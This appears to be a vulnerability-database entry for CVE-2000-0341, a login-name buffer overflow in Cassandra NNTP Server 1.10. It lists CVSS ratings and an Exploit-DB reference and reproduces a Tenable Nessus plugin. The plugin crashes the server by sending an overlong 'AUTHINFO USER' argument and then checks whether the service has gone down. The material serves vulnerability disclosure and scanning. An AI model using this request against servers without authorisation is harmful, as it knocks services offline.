Vulnerabilities > CVE-2000-0341 - Unspecified vulnerability in Atrium Software Cassandra Nntp Server 1.10

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
atrium-software
nessus
exploit available

Summary

ATRIUM Cassandra NNTP Server 1.10 allows remote attackers to cause a denial of service via a long login name.

Vulnerable Configurations

Part Description Count
Application
Atrium_Software
1

Exploit-Db

descriptionAtrium Software Cassandra NNTP Server 1.10 Buffer Overflow Vulnerability. CVE- 2000-0341,CVE-2000-0341. Dos exploit for windows platform
idEDB-ID:19884
last seen2016-02-02
modified2000-05-01
published2000-05-01
reporterUssr Labs
sourcehttps://www.exploit-db.com/download/19884/
titleAtrium Software Cassandra NNTP Server 1.10 - Buffer Overflow Vulnerability

Nessus

NASL familyDenial of Service
NASL idCASSANDRA_NNTP_DOS.NASL
descriptionA vulnerable version of Cassandra NNTP Server appears to be running on the remote host. Providing a long argument to the
last seen2020-06-01
modified2020-06-02
plugin id10388
published2000-05-02
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10388
titleCassandra NNTP Server Login Name Remote Overflow DoS
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(10388);
 script_bugtraq_id(1156);
 script_version ("1.23");
 script_cve_id("CVE-2000-0341");
 script_name(english:"Cassandra NNTP Server Login Name Remote Overflow DoS");
 script_summary(english:"Crashes the remote NNTP server");
 
 script_set_attribute(
   attribute:"synopsis",
   value:"The remote NNTP server has a remote buffer overflow vulnerability."
 );
 script_set_attribute(attribute:"description", value:
"A vulnerable version of Cassandra NNTP Server appears to be running
on the remote host.  Providing a long argument to the 'AUTHINFO USER'
command results in a buffer overflow.  A remote attacker could use
this to create a denial of service, or possibly execute arbitrary code." );
 # https://web.archive.org/web/20080527035215/http://archives.neohapsis.com/archives/ntbugtraq/2000-q2/0072.html
 script_set_attribute(
   attribute:"see_also",
   value:"http://www.nessus.org/u?26e24ed6"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of the software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/05/02");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/05/01");
 script_cvs_date("Date: 2018/06/29 12:00:59");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_family(english:"Denial of Service");
 
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");

 script_dependencie("find_service_3digits.nasl");
 script_require_ports("Services/nntp", 119);
 
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc:"nntp", default:119, exit_on_fail: 1);

soc = open_sock_tcp(port);
if (! soc) exit(1, "Cannot connect to TCP port "+port+".");

  r = recv(socket:soc, length:8192);
  if("posting allowed" >< r)
  {
    s = string("AUTHINFO USER ", crap(10002), "\r\n");
    send(socket:soc, data:s);
    close(soc);

    soc2 = open_sock_tcp(port);
    if (! soc2)
    {
      if (service_is_dead(port: port, exit:1) > 0)
        security_hole(port);
    }
    r2 = recv(socket:soc2, length:1024);
    if(!r2)
    {
      security_hole(port);
    }
    close(soc2);
  }